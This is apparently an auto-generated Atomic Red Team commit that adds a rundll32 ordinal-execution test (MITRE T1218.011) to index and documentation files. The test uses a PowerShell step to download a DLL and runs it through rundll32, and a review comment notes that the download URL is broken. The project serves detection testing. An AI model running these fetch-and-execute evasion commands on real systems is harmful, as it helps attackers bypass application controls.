From 9e92f29f6bf0e8f2c12db0b68684fee00bc855d4 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Tue, 8 Feb 2022 17:38:57 +0000
Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv | 1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv | 1 +
 atomics/Indexes/Indexes-Markdown/index.md | 1 +
 .../Indexes/Indexes-Markdown/windows-index.md | 1 +
 atomics/Indexes/index.yaml | 33 ++++++++++++-
 atomics/T1218.011/T1218.011.md | 49 +++++++++++++++++++
 6 files changed, 85 insertions(+), 1 deletion(-)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 5ae1b775..2816134b 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -545,6 +545,7 @@ defense-evasion,T1218.011,Rundll32,6,Rundll32 setupapi.dll Execution,71d771cd-d6
 defense-evasion,T1218.011,Rundll32,7,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt
 defense-evasion,T1218.011,Rundll32,8,Launches an executable using Rundll32 and pcwutl.dll,9f5d081a-ee5a-42f9-a04e-b7bdc487e676,command_prompt
 defense-evasion,T1218.011,Rundll32,9,Execution of non-dll using rundll32.exe,ae3a8605-b26e-457c-b6b3-2702fd335bac,powershell
+defense-evasion,T1218.011,Rundll32,10,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
 defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 defense-evasion,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index f02d0529..8af9c350 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -371,6 +371,7 @@ defense-evasion,T1218.011,Rundll32,6,Rundll32 setupapi.dll Execution,71d771cd-d6
 defense-evasion,T1218.011,Rundll32,7,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt
 defense-evasion,T1218.011,Rundll32,8,Launches an executable using Rundll32 and pcwutl.dll,9f5d081a-ee5a-42f9-a04e-b7bdc487e676,command_prompt
 defense-evasion,T1218.011,Rundll32,9,Execution of non-dll using rundll32.exe,ae3a8605-b26e-457c-b6b3-2702fd335bac,powershell
+defense-evasion,T1218.011,Rundll32,10,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
 defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index fd14f63c..ba0c1d26 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -860,6 +860,7 @@
 - Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows]
 - Atomic Test #8: Launches an executable using Rundll32 and pcwutl.dll [windows]
 - Atomic Test #9: Execution of non-dll using rundll32.exe [windows]
+ - Atomic Test #10: Rundll32 with Ordinal Value [windows]
 - T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index be0fab5e..67f8c56b 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -612,6 +612,7 @@
 - Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows]
 - Atomic Test #8: Launches an executable using Rundll32 and pcwutl.dll [windows]
 - Atomic Test #9: Execution of non-dll using rundll32.exe [windows]
+ - Atomic Test #10: Rundll32 with Ordinal Value [windows]
 - T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 84705ffa..26fd893d 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -36438,7 +36438,38 @@ defense-evasion:
 '
 executor:
 name: powershell
- command: 'rundll32.exe #{input_file}, StartW'
+ command: 'rundll32.exe #{input_file}, StartW
+
+'
+ - name: Rundll32 with Ordinal Value
+ auto_generated_guid: 9fd5a74b-ba89-482a-8a3e-a5feaa3697b0
+ description: "Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer.
+ \nUpon successful execution, Calc.exe will spawn.\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ input_url:
+ description: Url to download the DLL
+ type: Url
+ default: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/bin/AllTheThingsx64.dll
+ input_file:
+ description: DLL File
+ type: String
+ default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx64.dll
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'DLL file must exist on disk at specified location
+
+'
+ prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
+
+'
+ executor:
+ name: command_prompt
+ command: 'rundll32.exe #{input_file},#2'
 T1134.005:
 technique:
 external_references:
diff --git a/atomics/T1218.011/T1218.011.md b/atomics/T1218.011/T1218.011.md
index 11b5f6de..9d1536a0 100644
--- a/atomics/T1218.011/T1218.011.md
+++ b/atomics/T1218.011/T1218.011.md
@@ -26,6 +26,8 @@ Rundll32 can also be used to execute scripts such as JavaScript. This can be don
 - [Atomic Test #9 - Execution of non-dll using rundll32.exe](#atomic-test-9---execution-of-non-dll-using-rundll32exe)
+- [Atomic Test #10 - Rundll32 with Ordinal Value](#atomic-test-10---rundll32-with-ordinal-value)
+
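Review bot: In the new `Rundll32 with Ordinal Value` entry, the `input_url` default is a GitHub `blob/master` page URL, so `get_prereq_command`'s `Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"` would most likely save the rendered HTML page under the `.dll` name rather than the file's bytes, and the `Test-Path`-only `prereq_command` would then report the dependency as satisfied. index.yaml is generated, so the correction belongs in the source atomic definition this entry mirrors: point `input_url` at the raw file content and consider verifying a known hash of the downloaded file in `prereq_command` so a stale or wrong download is detected rather than silently accepted. The description states that ordinal `#2` is `DLLRegisterServer`; an export ordinal is a property of the specific DLL's export table, not of rundll32 ordinal loading in general, so if that mapping holds for the referenced `AllTheThingsx64.dll` I'd say so explicitly, e.g. `description: "Rundll32.exe loading a DLL by export ordinal (#2 is DllRegisterServer in the referenced AllTheThings DLL). ..."`. The regenerated test #9 `command:` also now carries two trailing newlines inside the quoted scalar, which suggests trailing blank lines in the source block scalar; presumably harmless at runtime but worth trimming at the source.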
@@ -400,4 +402,51 @@ Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
+
+
+
+## Atomic Test #10 - Rundll32 with Ordinal Value
+Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer.
+Upon successful execution, Calc.exe will spawn.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 9fd5a74b-ba89-482a-8a3e-a5feaa3697b0
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| input_url | Url to download the DLL | Url | https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/bin/AllTheThingsx64.dll|
+| input_file | DLL File | String | PathToAtomicsFolder\T1218.010\bin\AllTheThingsx64.dll|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+rundll32.exe #{input_file},#2
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: DLL file must exist on disk at specified location
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{input_file}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
+```
+
+
+
+